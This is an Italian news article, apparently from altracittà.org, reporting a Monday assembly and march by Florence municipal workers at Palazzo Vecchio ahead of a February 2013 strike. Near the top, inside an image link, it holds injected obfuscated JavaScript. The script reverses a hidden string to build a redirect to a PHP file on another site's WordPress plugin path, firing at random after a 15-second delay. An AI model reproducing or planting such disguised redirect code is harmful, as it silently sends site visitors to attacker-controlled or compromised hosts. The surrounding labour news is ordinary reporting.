Sotto Palazzo Vecchio, continua la mobilitazione dei lavoratori

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2013/02/palvecchio.jpg”>di Stefano Cecchi per l’Altracittà

Si è tenuto anche questo Lunedi il presidio in Palazzo Vecchio dei lavoratori e delle lavoratrici del Comune di Firenze. Oltre 500 lavoratori si sono riuniti in un presidio assemblea dove sono stati illustrati ai lavoratori gli esiti dell’incontro con il Sindaco. E’ stata ribadita la necessità di proseguire la mobilitazione del Lunedi in concomitanza con i Consigli Comunali, e di preparare la scadenza dello sciopero del 14 Febbraio 2013 in ogni sede di lavoro, motivando al massimo tutti i colleghi a partecipare alla manifestazione. Le parole d’ordine sono chiare ritiro immediato del Contratto Unilaterale e della Determinazione Dirigenziale successiva.

Al termine dell’assemblea i lavoratori e le lavoratrici si sono mossi in corteo, corteo che ha percorso le strade intorno a Palazzo Vecchio concludendosi di fronte all’ingresso del palazzo. Quella che ci attende è una lotta di lunga durata che necessità del coinvolgimento e della partecipazione di tutti i lavoratori. Ancora una volta l’unica assente dalla piazza è stata la politica, che preferisce stare rinchiusa nei palazzi! Il prossimo appuntamento è per Lunedi 11 Febbraio 2013 sempre alle ore 15.00.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *